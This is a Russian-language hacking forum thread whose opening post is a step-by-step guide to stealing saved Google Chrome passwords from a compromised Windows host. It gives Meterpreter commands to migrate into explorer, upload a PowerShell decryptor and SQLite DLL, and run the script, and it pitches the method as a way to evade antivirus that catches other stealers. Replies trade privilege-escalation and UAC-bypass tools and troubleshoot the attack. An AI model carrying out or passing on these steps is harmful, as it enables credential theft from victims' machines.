Dump Chrome Passwords

Всем привет! Думаю каждый сталкивался с такой проблемой, когда нужно взять пассы, но тот же метерпретер по каким-то причинам не справляется с этой задачей. Обычные стилаки типа LaZagne убиваются антивирусами, на приватные стиллеры нет денег, либо есть деньги, но нет надежных людей. При конвертировании питоновских файлов какие-то ошибки. Все бесит, нервы сдают, но выход есть всегда и сегодня - это изъятия пассов с помощью powershell скрипта.

Статья написана в дополнении к этой статье.
Инструмент предназначен для дампа паролей из ОС Windows, Browser Google Chrome

Атакующая машина : Kali linux 2017.3
Атакуемая машина : Windows Server 2012 R2 (EN)

Источник: https://github.com/p0z/CPD

Что нужно ?
1. Естественно получить агента ( сессию ) куда угодно: Empire, Meterpreter . В моем случае этот будет Метерпретер

2. Мигрировать в explorer! Создать на диске каталог и закинуть туда наши 2 файла.

Migrate:

pgrep explorer
pid - ваш explorer
migrate pid

Создание каталога:

mkdir Pass
cd Pass

Загрузка файлов в созданный каталог (test):

upload путь к файлу на диске

upload /root/CPD/Chrome_Passwords_Decryptor.ps1
upload /root/CPD/System.Data.SQLite.dll

3. Потереть ручки и выполнить следующую команду:

powershell -file Chrome_Passwords_Decryptor.ps1

Отлично, на выходе получаем вот это :

​

Prof1t! ​

P.S. Если не мигрировать, то пассов Вам не видать.​

Я бы даже выделил следующие преимущества:

1. Просто в исполнении.
2. Отрабатывает быстро в отличии от того же модуля в метерпретер, который подтягивает куки, историю и тд..
3. Не требует закрытие процесса Хром в отличии от модуля в Empire.

P.S. протестировал только на одной машине в связи с тем, что статью писать начал, а другой винды под рукой не оказалось. Уже решил дописать так. Завтра протестирую допустим на win 10 и поделюсь результатами!

Вот такой получился лайтовый гайд. Всем спасибо за внимание и до новых встреч !

 

[OneDollar]

делал как в твоей - статье

Вот именно в такой ситуации и не получается

Всегда моделирую не простые задачи , не знаешь с чем столкнешься



Посмотреть вложение 13835

Okey, пробовал с помощью DeathStar-master поднять привилегии ? Или

Или Sherlock-master

Или

 

[IKUS]

Okey, пробовал с помощью DeathStar-master поднять привилегии ? Или

Или Sherlock-master

Или

- Сейчас попробую , отпишусь по результату.
[doublepost=1513264127,1513184743][/doublepost]

- Сейчас попробую , отпишусь по результату.

---------

Экспериментировал с DeathStar-master : ситуация следующая - при вызове ланстера DeathStar-master , выдает ошибки
Насколько я понял DeathStar-master работает исключительно с пользователями AD ( ну не факт ) .
Любая ошибка напрягает, как бы начинает выводить агента - потом ошибки наворачиваются

enigma_fileless_uac_bypass - privilege escalation -
Enigma - поднимает 2 -ую сессию , но привилегии не меняет . Эксплойт не отрабатывает

Прбывал с Winpayloads , но тоже ошибки , что-то с импортированием модулей

 

[ActionNum]

скрин хотя бы дай

Посмотреть вложение 13703

после мигрирования вроде и enum_chrome другие ошибки пишет
Посмотреть вложение 13705[/quote]
Не стоит работать в каталоге System32, лучше в пользовательских от которых у вас текущая сессия.

 

[IKUS]

- Автор ., Как Вам удалось вывести инфу по длине во весь экран ( так ,как на скрине ) . Идет постоянно обрезано

 

[~localhost]

Сделал сначала его потом enum_chrome пассы отличались и в последнем случае пароли рабочие.

 

[OneDollar]

- Автор ., Как Вам удалось вывести инфу по длине во весь экран ( так ,как на скрине ) . Идет постоянно обрезано

Хм, у меня все нормально было с этим..